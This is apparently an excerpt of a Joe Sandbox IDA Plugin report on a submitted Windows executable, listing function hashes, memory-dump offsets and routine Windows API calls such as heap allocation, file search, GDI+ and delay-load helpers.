                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 7b4ea4b58db5d518e1628a7905ec2734f0b551fd4ae2aa445d6a33203102b3d4
                                                                                                                    • Instruction ID: 0fdb5751193aa293418500f3d842c7b2cab04d2c2218ed0d1a51c66a6928a2a9
                                                                                                                    • Opcode Fuzzy Hash: 7b4ea4b58db5d518e1628a7905ec2734f0b551fd4ae2aa445d6a33203102b3d4
                                                                                                                    • Instruction Fuzzy Hash: AF4124B0905B409AE724DF798885AE7FAE5BF19310F50493ED5FE83282CB356654CB14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0005B098
                                                                                                                      • Part of subcall function 000413DC: __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 372611c31f42078c11c965b1bff2e6728d178558148f4b90b537b2d28668c168
                                                                                                                    • Instruction ID: e745c311d9b55c99bb192b369323cc48d96145f2383e7ad431698b77f4138e88
                                                                                                                    • Opcode Fuzzy Hash: 372611c31f42078c11c965b1bff2e6728d178558148f4b90b537b2d28668c168
                                                                                                                    • Instruction Fuzzy Hash: AE317CB1C00249AACF15DF64C8519EFBBB4AF09300F5044AEE809B7242DB35AF08CBA5
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0006ACF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: 18303b0dbd207dff11fa296e32ab448a5bf6aebf50849b3bf3839911bfcf67c3
                                                                                                                    • Instruction ID: fab295fe0eddeada90d7127d70754871dce9b81e9b1b44bc439c87245802e088
                                                                                                                    • Opcode Fuzzy Hash: 18303b0dbd207dff11fa296e32ab448a5bf6aebf50849b3bf3839911bfcf67c3
                                                                                                                    • Instruction Fuzzy Hash: C911E733B016255FEB25AE2CDC4099E73D7AF863307168120ED1ABB254D634EC41CBD2
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0004CE45
                                                                                                                      • Part of subcall function 00045E37: __EH_prolog.LIBCMT ref: 00045E3C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: eec8906e0fbbb052056931e1f6ca843c5fcb1e7004fce4a70b9bea6171fad709
                                                                                                                    • Instruction ID: 6d33858b9edcb6ef0e0c78e03e2f3c79cfcfd29254b240ca4113504911081ce1
                                                                                                                    • Opcode Fuzzy Hash: eec8906e0fbbb052056931e1f6ca843c5fcb1e7004fce4a70b9bea6171fad709
                                                                                                                    • Instruction Fuzzy Hash: 411151B1A01284DAEB14DB79C545BEEB7E8DF45301F14446DA44693283DB745B04C766
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 02f57a2b8030d08a1d7bfa0f611a2308fa5b7bfefcfec0394d9be87b454b9bde
                                                                                                                    • Instruction ID: 33abffe9eac5ab2d7a03787da710a8208d06815bbc485400285533fad861f78b
                                                                                                                    • Opcode Fuzzy Hash: 02f57a2b8030d08a1d7bfa0f611a2308fa5b7bfefcfec0394d9be87b454b9bde
                                                                                                                    • Instruction Fuzzy Hash: 31018EB3900528BBCF12AFA8CD819DFB771BF88750B014235E816B7223DA749D0486A8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00069813,00000001,00000364,?,00063F73,00000050,?,00081030,00000200), ref: 0006B177
                                                                                                                    • _free.LIBCMT ref: 0006C4E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: ccb27eafbce8a3d12649e8a47cdd546b84de49c99060b4cfbe3c0e7c9055e9aa
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: 0101D6722003056BE331DF659895DAAFBEEFB89370F25062DE5D493282EA30A905C774
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00069813,00000001,00000364,?,00063F73,00000050,?,00081030,00000200), ref: 0006B177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00063C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00045AC2
                                                                                                                      • Part of subcall function 0004B505: __EH_prolog.LIBCMT ref: 0004B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6C4
                                                                                                                      • Part of subcall function 0004A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6F2
                                                                                                                      • Part of subcall function 0004A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00050E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0005A62C
                                                                                                                      • Part of subcall function 0005A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: e282285053d7e29f30700bd0ba8d0660d62736d6321da623e048d237932f3c1f
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: 4FD0C77131020D76DF456B61CC169AF7595EB05345F048225BC41D5152EAB1DA189563
                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00051B3E), ref: 0005DD92
                                                                                                                      • Part of subcall function 0005B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                      • Part of subcall function 0005B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                      • Part of subcall function 0005B568: IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                      • Part of subcall function 0005B568: TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                      • Part of subcall function 0005B568: DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 897784432-0
                                                                                                                    • Opcode ID: c51083655de05ce9ffe47cc99f292e66d37acf3def1908bb809fd457138e6e30
                                                                                                                    • Instruction ID: 5342c4ee6d90c88892bf8435d4300c600cfd43ec23a8ebf81d962ccc8f1bb2bc
                                                                                                                    • Opcode Fuzzy Hash: c51083655de05ce9ffe47cc99f292e66d37acf3def1908bb809fd457138e6e30
                                                                                                                    • Instruction Fuzzy Hash: 3DD09E32144300BAE6112B51CD06F1F7AA2BB88B05F404554B685740B28B72AD21DB11
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0005E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DloadProtectSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2203082970-0
                                                                                                                    • Opcode ID: 960d0ba0a49b6ac80f78bcba906c94334fe61b4d2a5560a8572e6d649b4e6d1f
                                                                                                                    • Instruction ID: 266626482868f24bdcef591dc329935ff815b72455ada2c9410788e23408868f
                                                                                                                    • Opcode Fuzzy Hash: 960d0ba0a49b6ac80f78bcba906c94334fe61b4d2a5560a8572e6d649b4e6d1f
                                                                                                                    • Instruction Fuzzy Hash: D4D0A7B00806D04AE209EB94DC457D632947315753F800040F9C9910D1EA6843888601
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,000497BE), ref: 000498C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: bd16769e6834404e49936f29927f564b96f9762ea356e4a1b72baf89eb7f62db
                                                                                                                    • Instruction ID: 2f1e894c459bcaf7e70fc95aa65e5b45d254cafb5ac482ca179a433696552f3a
                                                                                                                    • Opcode Fuzzy Hash: bd16769e6834404e49936f29927f564b96f9762ea356e4a1b72baf89eb7f62db
                                                                                                                    • Instruction Fuzzy Hash: 67C01274400105858E60462898440967351AB533657B487BCC068850E1C726CC87EA14
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 9d977304b1384e4d078de69e052c6845c44cfd9d0954eaabe306de176d547340
                                                                                                                    • Instruction ID: b8558f3dd519e4756e8c1b8680fdecabf8390f1c04ae69223ac804cfc956752a
                                                                                                                    • Opcode Fuzzy Hash: 9d977304b1384e4d078de69e052c6845c44cfd9d0954eaabe306de176d547340
                                                                                                                    • Instruction Fuzzy Hash: 6AB012F5258580BC320C1185DE03C3B020DC3C2B12330C43FFC49C8481DC44AF490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: eb3b2148ce92bab896bf3b7c09ef29f146eddfd34395cc1b673ff6753e9d5bf1
                                                                                                                    • Instruction ID: 80e90674f6620a185d5a1259c28cecf4c7fbe6932b358af900bc955c0f454576
                                                                                                                    • Opcode Fuzzy Hash: eb3b2148ce92bab896bf3b7c09ef29f146eddfd34395cc1b673ff6753e9d5bf1
                                                                                                                    • Instruction Fuzzy Hash: 85B092E5258580AC320851899E02C3B020DC381B12320802EBC49C808198446E480535
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: f64f97c80b64358c5eab6568a5b9a92dd24f16b91a72aac827cf81d101cdf859
                                                                                                                    • Instruction ID: 6841902e926ba29d9a7d367ef15ef9d21ae59b34ad7936bb7068bf180cbe24d4
                                                                                                                    • Opcode Fuzzy Hash: f64f97c80b64358c5eab6568a5b9a92dd24f16b91a72aac827cf81d101cdf859
                                                                                                                    • Instruction Fuzzy Hash: 7EB092E1258480AC320852459E02C3B020DC3C2B12320C02EBC49C81819844AA490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d9a667576995772e919284dba0a74f16691fe5875fe121bb29be1584486ea3b2
                                                                                                                    • Instruction ID: ffd3c24d14723eb8a09e7f44b7450241beb36ca7231293b131a811bb8b83d0d7
                                                                                                                    • Opcode Fuzzy Hash: d9a667576995772e919284dba0a74f16691fe5875fe121bb29be1584486ea3b2
                                                                                                                    • Instruction Fuzzy Hash: 33B092E1259480AC324851459E02C3B020EC382B12320802EBC49C80819844AA491435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 8eb09521f9ebacafdfe9c878959dafb986ceb37d44e03197962d0bebf38e95a5
                                                                                                                    • Instruction ID: a6f3d1d60abd013cf308389aba3afc63e4c70760f0215ea74a270f0fe7564678
                                                                                                                    • Opcode Fuzzy Hash: 8eb09521f9ebacafdfe9c878959dafb986ceb37d44e03197962d0bebf38e95a5
                                                                                                                    • Instruction Fuzzy Hash: 65B092F5259580BC328852459E02C3B020EC381B12320812EBC49C808198446A880435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a4394eb761a91fc89f3a0134cdfe003a9cb4a6c9aab03e6d40e34479b58039a7
                                                                                                                    • Instruction ID: 4de3f7dd1e4f66a11e749bb98fe25c8f7e8d4398f3b55cb45f42e090c62cb3d7
                                                                                                                    • Opcode Fuzzy Hash: a4394eb761a91fc89f3a0134cdfe003a9cb4a6c9aab03e6d40e34479b58039a7
                                                                                                                    • Instruction Fuzzy Hash: 07B092E1269480AC324851459E02C3B024EC781B12320802EBC4AC808198446A480435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 4b7dda4761bb8024599f91dd081e6a7d23cd920adbe7fe7290c6d52b7dc1a952
                                                                                                                    • Instruction ID: 71da6aa0d2a8d93b5380325ea3510ae97cb9e1319c0d39a0ad2154fc780726fc
                                                                                                                    • Opcode Fuzzy Hash: 4b7dda4761bb8024599f91dd081e6a7d23cd920adbe7fe7290c6d52b7dc1a952
                                                                                                                    • Instruction Fuzzy Hash: 60B012F1258480BC320C5195DE02C7B024DC3C2B12330C03FFD4DC8081DC44AF490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d2d98577a7af2e2248566465bb28a9e62586bb0bac30a062582c540d25366175
                                                                                                                    • Instruction ID: d2ee33bb3d7c2105d52efad475b757593915f0145c3c0dfd03a5aaf60e47155d
                                                                                                                    • Opcode Fuzzy Hash: d2d98577a7af2e2248566465bb28a9e62586bb0bac30a062582c540d25366175
                                                                                                                    • Instruction Fuzzy Hash: FCB092F1258480AC320851859E02C7B028DC381B12320803EBC49C80819C456B490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c1a2be80c3fe4ad56264ae0c9097cfc3635d9981660b3669325720a11642b8d2
                                                                                                                    • Instruction ID: 59e33e7429fd756241ccf5fbf9d368d259d3c00df5e9c83ab8a4f33294446506
                                                                                                                    • Opcode Fuzzy Hash: c1a2be80c3fe4ad56264ae0c9097cfc3635d9981660b3669325720a11642b8d2
                                                                                                                    • Instruction Fuzzy Hash: 77B092E16980807C320851449906C7B0208C381B12320C02EFA58C508198480A4D0832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3dc373d8ad46562a85122d278fbd665f14bfbeb75346757e94881dbc449fab13
                                                                                                                    • Instruction ID: 38d3536c38b64bd3cc4debb5036a49e3dbd5ae751ced6eb053c4b0966518e0cf
                                                                                                                    • Opcode Fuzzy Hash: 3dc373d8ad46562a85122d278fbd665f14bfbeb75346757e94881dbc449fab13
                                                                                                                    • Instruction Fuzzy Hash: 90B092F1658080BC320891449806C3B0208C381B12320802EFD58C5081D8484B480432
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b89ea88bd218b61385e7a11778af1122185db45f01b2520e138d13240ef7edff
